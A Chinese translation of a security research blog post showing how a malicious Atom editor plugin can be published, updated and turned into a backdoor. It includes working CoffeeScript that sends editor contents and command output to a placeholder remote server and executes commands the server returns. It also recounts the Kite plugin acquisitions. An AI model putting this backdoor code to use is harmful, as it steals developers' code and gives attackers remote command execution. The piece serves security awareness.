安全路透社
当前位置:安全路透社 > 安全客 > 正文

【技术分享】如何通过恶意插件在Atom中植入后门


http://p5.qhimg.com/t01df330e093681e0e4.png

背景


在生活和工作中,我们往往都需要用到一些类型的编辑器,这样才能开展我们的工作。但是,当选择一个编辑器时,每个人都有自己的看法。有些人是新潮派,喜欢使用像Atom或者Sublime这一类型的现代编辑器,而另外一些人则是守旧派,更喜欢坚持使用像Vim或Emacs这一类型的编辑器。无论你选择什么,对于一款编辑器而言,你最想做的可能就是以某种方式对此工具进行自定义操作。

现代编辑器的插件和扩展功能都是非常强大的。除了外观上的一些自定义之外(字体,配色方案等),它们还提供了一系列功能,这些功能能够使您的生活和工作变得更轻松,您应该能够找到一个适合您需要的插件。如果没有,你可以创建和发布一个。

通常情况下,用户会下载新的插件以满足他们的需求,这样他们的插件列表就会变得越来越多(因为谁会有时间去删除那么旧的或者未使用的插件呢?)。这其中,许多编辑器是支持自动更新的,以确保及时的修复bug以及增添新功能等。

对于这篇文章,我将重点研究Atom这款编辑器工具Github上的“明星”编辑器。根据他们的网站介绍,这是一个“21世纪的黑客文本编辑器”。 Atom编辑器的用户群在不断增长,它包含了各种各样的软件包。您甚至可以通过一些小技巧在Chromebook上安装Atom,这些技巧是通过绕过ChromeOS上的基本安全模型,使得您可以在Chromebook上安装Atom。


目标


我的任务是探索恶意的Atom插件对该工具的影响程度到底有多大。我们不知道我们将要面临什么障碍,不知道Atom会不会有什么安全措施来阻止我们的恶意程序。但事实证明,没有任何的阻碍…在几个小时之内,我不仅发布了我的第一个应用程序,而且更新了它,在此应用程序中还包含有一点点的恶意代码。

计划很简单:

第一步:获取一个已经发布的简单的包或者插件

这个过程我们需要什么以及该过程是否有难度(我们是否需要我们的应用程序被审查)?

第二步:测试更新过程

如果你打算创建一个恶意软件包,那么你将首先需要创建一个非恶意软件包,这个非恶意的软件包需要拥有一个庞大的用户群,然后推送一个软件更新,该更新包中包含了一些恶意的代码

第三步:从Atom包中实际测试我们可以实现的功能

我们需要确定我们的恶意软件是否在沙箱中运行以及我们拥有访问哪些系统库的权限等。


创建简易插件


步骤1

网络上有很多指南可以用来指导如何创建和发布Atom的包,包括在Atom官方网站上就有一个很详细的指南。生成一个新的包需要的步骤是:

1.创建一个新的包:

cmd + shift + p

Package Generator: Generate Package 

2.步骤1将为我们生成一个简单的包,这个包只包含了一个toggle方法,这个方法我们将在稍后会使用到:

toggle: ->

console.log 'touch-type-teacher was toggled!'

3.将代码推送到Git 仓库

git init
git add .
git commit -m "First commit"
git remote add origin <remote_repo_url>
git push -u origin master

4.发布我们创建的Atom包

apm-beta publish minor

步骤2

在初始设置完成后,我们接下来将对我们之前创建的包做一些修改

toggle: ->

console.log 'touch-type-teacher was toggled!'
console.log 'update test'

将代码推送到Github

git commit -a -m 'Add console logging'
git push

发布新版本的代码

apm-beta publish minor

从第一步和第二步操作来看,发布和更新一个Atom包是非常容易的操作,下一步将看看我们发布的包实际上可以干些什么事情。


这似乎是一个合理的请求


步骤3

可以看到,Atom包是通过node.js技术创建的,初始测试我们可以看看有哪些模块可以访问。从请求包入手似乎是一个很好的开始,因为它允许我们将数据从用户的机器中取出并进入我们自己手中。

1.经过一番技术研究发现,可以很容易导入一个第三库到我们的包中:

npm install --save request@2.73.0
apm install

2.把这个第三库导入我们的代码中:

request = require 'request'

3.更新我们的代码,用户机器会将一些数据发布到我们的远程服务器

toggle: ->

request 'http://my-remote-endpoint.com/run?data=test_data', (error, response, body) =>            
console.log 'Data sent!'

有了这个,一旦toggle函数被调用,那么我们的包就会自动发送信息给我们。现在我们有一种获取信息的方法,我们需要看看我们能够访问哪些信息。


植入后门代码


我们更改我们的toggle函数尝试获取当前用户机器上的的数据,代码如下所示:

toggle: ->

{spawn} = require 'child_process'
test = spawn 'whoami'
test.stdout.on 'data', (data) ->
request 'http://my-remote-endpoint.com/run?data='+data.toString().trim(), (error, response, body) =>
console.log 'Output sent!'

上面的这个代码片段在实际的运行中是有效的,这意味着我们可以在用户的机器上运行命令,然后根据需要从返回的数据中提取我们需要的数据。其实现在,我们发布的Atom包已经可以执行一些恶意的操作了,但是我们有必要做进一步的研究。


更进一步


之前,我们的命令是硬编码到我们的代码中的,现在我们将修改代码使得软件能够自动发送需要执行的命令! 之前我们创建的Atom包中,只有toggle函数被调用时才会触发执行命令,现在我们将修改代码,完成一旦一个按键被按下就会触发执行命令的函数。

首先我们需要去hook当前编辑器的onChange事件:

module.exports = TouchTypeTeacher = 
touchTypeTeacherView: null 
modalPanel: null 
subscriptions: null 
editor: null

activate: (state) -> 
@touchTypeTeacherView = new TouchTypeTeacherView(state.touchTypeTeacherViewState) 
@modalPanel = atom.workspace.addModalPanel(item: @touchTypeTeacherView.getElement(), visible: false) 
@editor = atom.workspace.getActiveTextEditor() 
@subscriptions = new CompositeDisposable

@subscriptions.add atom.commands.add 'atom-workspace', 'touch-type-teacher:toggle': => @toggle() 
@subscriptions.add @editor.onDidChange (change) => @myChange()

之后,在Atom包中创建myChange函数,该函数将执行一些恶意的操作:

myChange: ->
    request 'http://my-remote-endpoint.com/test?data=' +@editor.getText(), (error, response, body) =>
        {spawn} = require 'child_process'
        test = spawn body
        console.log 'External code to run:\n' + body
        test.stdout.on 'data', (data) ->
           console.log 'sending output'
           request 'http://my-remote-endpoint.com/run?data=' + data.toString().trim(), (error, response, body) =>
               console.log 'output sent!'

这段代码片段实现了我们想要完成的功能。 编辑器中每发生一个变化,我们都会将编辑器中的文本发送到我们的服务器,然后服务器会返回一个新的命令到用户的机器上执行。 我们运行命令并将执行结果发送到我们的服务器。

现实在存在的后门插件


虽然我们只是想演示这种攻击是如何发生的,但是现实中却出现了一个有趣的故事。Kite公司,一家生产基于云编码工具的软件公司,该公司招聘了Minimap(一个Atom插件,超过380万次下载)的开发人员,随后Minimap插件推出了一个更新,此更新除了其他功能之外,将Kite公司的广告插入到Minimap插件中。同样的,我们发现Kite公司在几个月前就默默地收购了autocomplete-python插件(另一个流行的Atom插件),以用来推广Kite公司的产品。

这个事情一经发现,Kite公司就被迫道歉并采取了相应的措施,以确保他们不会再这样做。但类似于Kite公司收购Atom包这种行为,在过去一周内有报道说,两个Chrome扩展已被网络攻击者利用,并向其中注入了广告软件。 Chrome和Copyfish的Web开发人员都将可能遭受网络钓鱼的攻击。有关这些事件的详细信息,请参阅这里(Web Developer)和这里(Copyfish),其主要原因是用户在不知情的情况了使用了有后门的Chrome的扩展程序。


总结


我们创建了一个插件,并发布了它,但这个插件并不具有任何的危害。此插件是在没有沙盒,没有任何权限限制的环境中运行的,而且也没有任何的防护去阻止我们窃取用户机器上的数据信息。即使安全研究人员会对上传的软件代码进行了某种分析,但攻击者也可以在软件运行时远程执行恶意代码。自动更新意味着即使我们的插件今天很好,但或许这款插件明天可能就会被植入了后门程序。

因此,虽然迫使开发人员仅使用某些可以控制的开发工具或者插件似乎看起来很不人性,但如果不受控制,我们将越来越难以确保这些工具的安全性。


原文链接:http://blog.thinkst.com/2017/08/all-your-devs-are-belong-to-us-how-to.html

未经允许不得转载:安全路透社 » 【技术分享】如何通过恶意插件在Atom中植入后门

赞 (0)
分享到:更多 ()

评论 0

评论前必须登录!

登陆 注册